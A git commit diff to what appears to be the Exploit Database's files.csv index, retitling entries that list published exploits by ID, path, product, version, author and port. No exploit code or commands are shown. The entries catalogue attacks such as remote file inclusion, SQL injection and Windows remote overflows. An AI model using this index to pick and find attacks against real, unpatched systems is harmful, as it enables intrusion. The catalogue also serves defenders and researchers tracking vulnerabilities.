Updated 07_11_2014

2014-07-11 04:39:06 +00:00 · 2014-07-11 04:39:06 +00:00 · 96dfb9b9da
commit 96dfb9b9da
parent 2d0742415b
40 changed files with 8708 additions and 8459 deletions
--- a/files.csv
+++ b/files.csv
@ -258,7 +258,7 @@ id,file,description,date,author,platform,type,port
 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
 273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0
 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
-275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
+275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
 276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53
 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
@ -1672,7 +1672,7 @@ id,file,description,date,author,platform,type,port
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
-1965,platforms/windows/remote/1965.pm,"MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
+1965,platforms/windows/remote/1965.pm,"MS Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
@ -1750,11 +1750,11 @@ id,file,description,date,author,platform,type,port
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability",2006-07-20,Aesthetico,php,webapps,0
 2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0
-2052,platforms/windows/remote/2052.sh,"MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
+2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
-2054,platforms/windows/remote/2054.txt,"MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
+2054,platforms/windows/remote/2054.txt,"MS Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
-2057,platforms/windows/dos/2057.c,"MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
+2057,platforms/windows/dos/2057.c,"MS Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0
@ -1856,9 +1856,9 @@ id,file,description,date,author,platform,type,port
 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0
 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
-2162,platforms/windows/remote/2162.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
+2162,platforms/windows/remote/2162.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0
-2164,platforms/windows/remote/2164.pm,"Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
+2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
 2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
 2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability",2006-08-10,Bl0od3r,php,webapps,0
@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port
 2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0
-2223,platforms/windows/remote/2223.c,"MS Windows CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
+2223,platforms/windows/remote/2223.c,"MS Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0
 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0
@ -1958,7 +1958,7 @@ id,file,description,date,author,platform,type,port
 2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0
 2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0
 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0
-2265,platforms/windows/remote/2265.c,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
+2265,platforms/windows/remote/2265.c,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0
@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port
 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0
 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0
 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0
-2355,platforms/windows/remote/2355.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
+2355,platforms/windows/remote/2355.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0
 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0
 2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0
@ -2105,7 +2105,7 @@ id,file,description,date,author,platform,type,port
 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0
 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0
 2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0
-2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
+2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0
 2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0
 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0
@ -2476,7 +2476,7 @@ id,file,description,date,author,platform,type,port
 2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0
 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0
-2789,platforms/windows/remote/2789.cpp,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
+2789,platforms/windows/remote/2789.cpp,"MS Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0
 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0
@ -2485,7 +2485,7 @@ id,file,description,date,author,platform,type,port
 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0
-2800,platforms/windows/remote/2800.cpp,"MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
+2800,platforms/windows/remote/2800.cpp,"MS Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0
 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0
 2809,platforms/windows/remote/2809.py,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445
@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port
 2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability",2006-12-08,"Paul Bakoyiannis",php,webapps,0
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
-2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
+2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
@ -2806,7 +2806,7 @@ id,file,description,date,author,platform,type,port
 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143
 3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0
 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability",2007-01-15,"ilker Kandemir",asp,webapps,0
-3137,platforms/windows/remote/3137.html,"MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
+3137,platforms/windows/remote/3137.html,"MS Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,N/A,windows,dos,0
 3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0
 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21
@ -2817,7 +2817,7 @@ id,file,description,date,author,platform,type,port
 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0
 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0
 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability",2007-01-17,GoLd_M,php,webapps,0
-3148,platforms/windows/remote/3148.pl,"MS Internet Explorer VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
+3148,platforms/windows/remote/3148.pl,"MS Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0
 3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 (lang/index.php file) Remote InclusionVulnerability",2007-01-17,3l3ctric-Cracker,php,webapps,0
 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0
@ -2861,7 +2861,7 @@ id,file,description,date,author,platform,type,port
 3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0
 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0
 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0
-3193,platforms/windows/dos/3193.py,"Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
+3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0
@ -3108,7 +3108,7 @@ id,file,description,date,author,platform,type,port
 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0
 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0
 3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0
-3444,platforms/windows/dos/3444.pl,"MS Internet Explorer (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
+3444,platforms/windows/dos/3444.pl,"MS Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0
 3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0
 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0
@ -3235,7 +3235,7 @@ id,file,description,date,author,platform,type,port
 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
-3577,platforms/windows/remote/3577.html,"MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
+3577,platforms/windows/remote/3577.html,"MS Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
@ -3342,7 +3342,7 @@ id,file,description,date,author,platform,type,port
 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0
-3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
+3688,platforms/windows/local/3688.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0
 3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0
@ -3381,7 +3381,7 @@ id,file,description,date,author,platform,type,port
 3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0
 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0
 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0
-3728,platforms/windows/remote/3728.c,"IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
+3728,platforms/windows/remote/3728.c,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (SQL Injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0
 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0
@ -3408,7 +3408,7 @@ id,file,description,date,author,platform,type,port
 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0
 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0
 3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0
-3755,platforms/windows/local/3755.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2007-04-17,"Lionel d'Hauenens",windows,local,0
+3755,platforms/windows/local/3755.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0
 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 Local Format String Exploit",2007-04-17,jamikazu,windows,local,0
 3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0
@ -3457,11 +3457,11 @@ id,file,description,date,author,platform,type,port
 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0
 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability",2007-04-26,koray,php,webapps,0
 3803,platforms/php/webapps/3803.txt,"phpOracleView (include_all.inc.php page_dir) RFI Vulnerability",2007-04-26,"Alkomandoz Hacker",php,webapps,0
-3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
+3804,platforms/windows/remote/3804.txt,"MS Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0
 3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0
 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0
-3808,platforms/windows/remote/3808.html,"IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
+3808,platforms/windows/remote/3808.html,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
 3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0
 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0
 3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 .IFF File Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0
@ -3544,7 +3544,7 @@ id,file,description,date,author,platform,type,port
 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 .RAS File Download/Execute Buffer Overflow Exploit (win32)",2007-05-09,"Kristian Hermansen",windows,local,0
 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0
 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0
-3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
+3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0
 3894,platforms/php/webapps/3894.txt,"Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability",2007-05-10,GoLd_M,php,webapps,0
 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - Remote SQL Injection Vulnerability",2007-05-10,warlord,php,webapps,0
@ -3644,7 +3644,7 @@ id,file,description,date,author,platform,type,port
 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0
